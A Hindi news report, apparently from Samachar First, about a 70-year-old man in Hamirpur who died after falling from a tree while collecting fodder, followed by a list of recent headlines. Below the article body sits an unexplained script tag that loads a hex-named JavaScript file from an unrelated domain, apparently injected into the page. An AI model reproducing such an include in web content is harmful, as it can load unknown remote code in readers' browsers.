हमीरपुरः पशुओं को चारा लेने के लिए पेड़ पर चढ़ा व्यक्ति अचानक गिरा नीचे, मौत

<p>जिला हमीरपुर में एक व्यक्ति की पेड़ से गिरकर मौत हो गई। व्यक्ति जिला मुख्यालय के ब्राह्मणी गांव का रहने वाला था। व्यक्ति की पहचान निवासी टीडु राम 70 साल के रूप में हुई है। जानकारी के अनुसार वह मंगलवार सुबह पशुओं के लिए चारा लेने गया था। वह पेड़ पर चढ़ा था कि इस दौरान अचानक वह अपना संतुलन खो बैठा और नीचे गिर गया। नीचे गिरते ही वह गंभीर रूप से घायल हो गया। लोगों ने उसे इलाज के लिए मेडिकल कॉलेज हमीरपुर पहुंचाया जहां डाक्टरों ने चैकअप के बाद उसे मृत घोषित कर दिया।</p>

<p>इस घटना की जानकारी पुलिस को दी गई। पुलिस ने सूचना मिलते ही केस दर्ज कर लिया। उन्होंने शव का पोस्टमार्टम करवाकर परिवारजनों को सौंप दिया। हमीरपुर थाना प्रभारी ने बताया कि मृतक के शरीर पर चोट के कोई भी निशान नहीं थे। असली कारण का पता पोस्टमार्टम रिपोर्ट आने के बाद ही पता चलेगा।</p>

<p><img src=”/media/gallery/images/image(1855).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

सीएम सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी, आईजएमसी में हुआ उपचार

Shimla: मुख्यमंत्री सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी है। मंगलवार रात को उपचार करवाने…

36 mins ago

पालमपुर कृषि विवि की 112 हेक्टेयर भूमि को पर्यटन विभाग के नाम पर हस्तांतरित करने पर हाईकोर्ट की रोक

  शिमला: चौधरी सरवण कुमार एग्रीकल्चर यूनिवर्सिटी पालमपुर की 112 हेक्टेयर लैंड को पर्यटन विभाग…

1 hour ago

उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी फरार

  UNA: जिला कारागार बनगढ़ से उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी…

3 hours ago

लापता लेडीज ऑस्कर के लिए नामांकित

  Chennai, Agencies: किरण राव की ‘लापता लेडीज’ को ऑस्कर पुरस्कार 2025 के लिए भारत…

4 hours ago

हिमाचल में किसानों को 50 प्रतिशत सब्सिडी पर 1100 में मिलेंगे साइकल-हल

  Hamirpur:  प्रदेश में किसानों को 50 प्रतिशत सब्सिडी पर साइकल-हल प्रदान किए जाएंगे। 2200…

5 hours ago

संजौली कॉलेज में SFI कार्यकर्ताओं और पुलिस बल में धक्का- मुक्की

  Shimla: 6 छात्र नेताओं के निष्कासन का मामला तूल पकड़ गया है। तनाव बढ़…

5 hours ago